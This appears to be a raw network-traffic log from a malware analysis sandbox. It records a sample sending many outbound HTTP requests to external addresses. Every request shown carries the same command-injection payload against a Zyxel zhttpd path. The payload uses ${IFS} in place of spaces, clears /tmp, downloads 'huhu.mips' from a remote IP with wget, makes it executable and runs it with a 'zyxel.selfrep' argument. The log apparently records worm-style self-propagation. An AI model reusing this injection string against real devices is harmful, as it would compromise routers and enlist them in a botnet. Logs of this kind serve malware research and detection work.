                                            Feb 2, 2024 06:21:17.720762968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5464192.168.2.154500064.127.126.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720805883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5465192.168.2.1549748210.2.111.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720834017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5466192.168.2.153796270.229.156.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720853090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5467192.168.2.154890496.241.128.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720900059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5468192.168.2.155660674.173.133.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720937014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5469192.168.2.155657414.86.40.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.720984936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5470192.168.2.1543898192.162.164.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721026897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5471192.168.2.154662254.201.108.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721050978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5472192.168.2.1539628144.203.189.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721107960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5473192.168.2.1554586184.112.40.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721112013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5474192.168.2.153971042.176.218.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721152067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5475192.168.2.1538304130.225.249.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721204042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5476192.168.2.1547018208.122.106.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721250057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5477192.168.2.155402439.183.171.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721288919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5478192.168.2.1554066104.242.103.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721328020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5479192.168.2.1547150117.176.247.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721350908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5480192.168.2.1545742168.156.70.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721411943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5481192.168.2.154249863.45.172.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721462011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5482192.168.2.1535674101.132.204.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721487999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5483192.168.2.153495023.115.130.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721520901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5484192.168.2.154637620.145.198.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721539021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5485192.168.2.1552892152.33.133.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721561909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5486192.168.2.1560364153.19.201.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721587896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5487192.168.2.155825466.197.96.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721647024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5488192.168.2.1555248110.181.4.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721673012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5489192.168.2.1550832195.213.73.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721714973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5490192.168.2.1536014145.99.76.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721736908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5491192.168.2.155076813.149.53.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721765995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5492192.168.2.1534116198.125.194.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721806049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5493192.168.2.1533608179.65.211.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721868992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5494192.168.2.153610442.93.227.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721899033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5495192.168.2.1548638153.120.175.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721926928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5496192.168.2.155390844.216.31.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721962929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5497192.168.2.155289012.234.170.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.721992016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5498192.168.2.1559402150.1.76.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722043991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5499192.168.2.1544418219.209.39.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722069979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5500192.168.2.153683049.47.103.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722101927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5501192.168.2.1534928178.100.110.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722143888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5502192.168.2.154122831.107.42.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722193003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5503192.168.2.155468662.220.27.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722222090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5504192.168.2.154753890.9.21.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722248077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5505192.168.2.155265877.50.153.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722294092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5506192.168.2.154908296.218.176.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722321033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5507192.168.2.154747236.95.110.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722354889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5508192.168.2.154009879.110.128.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722409010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5509192.168.2.1546522197.125.42.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722451925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5510192.168.2.1558664125.6.49.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722492933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5511192.168.2.1539038208.188.126.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722521067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5512192.168.2.153457676.215.125.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722553968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5513192.168.2.153740093.24.104.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722600937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5514192.168.2.153741649.18.137.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722646952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5515192.168.2.1533048136.64.175.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722683907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5516192.168.2.155307458.98.228.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722712994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5517192.168.2.1533214164.83.124.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722749949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5518192.168.2.1540670212.31.191.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722800016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5519192.168.2.1547772143.231.102.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722852945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5520192.168.2.154791492.200.78.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722887993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5521192.168.2.1549598223.194.122.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722923040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5522192.168.2.1557996186.22.185.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.722960949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5523192.168.2.154959053.172.177.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723010063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5524192.168.2.1538920180.114.33.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723036051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5525192.168.2.153875860.124.152.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723062992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5526192.168.2.1543296103.55.6.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.723112106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5527192.168.2.1533126207.49.53.119443
                                            TimestampBytes transferredDirectionData
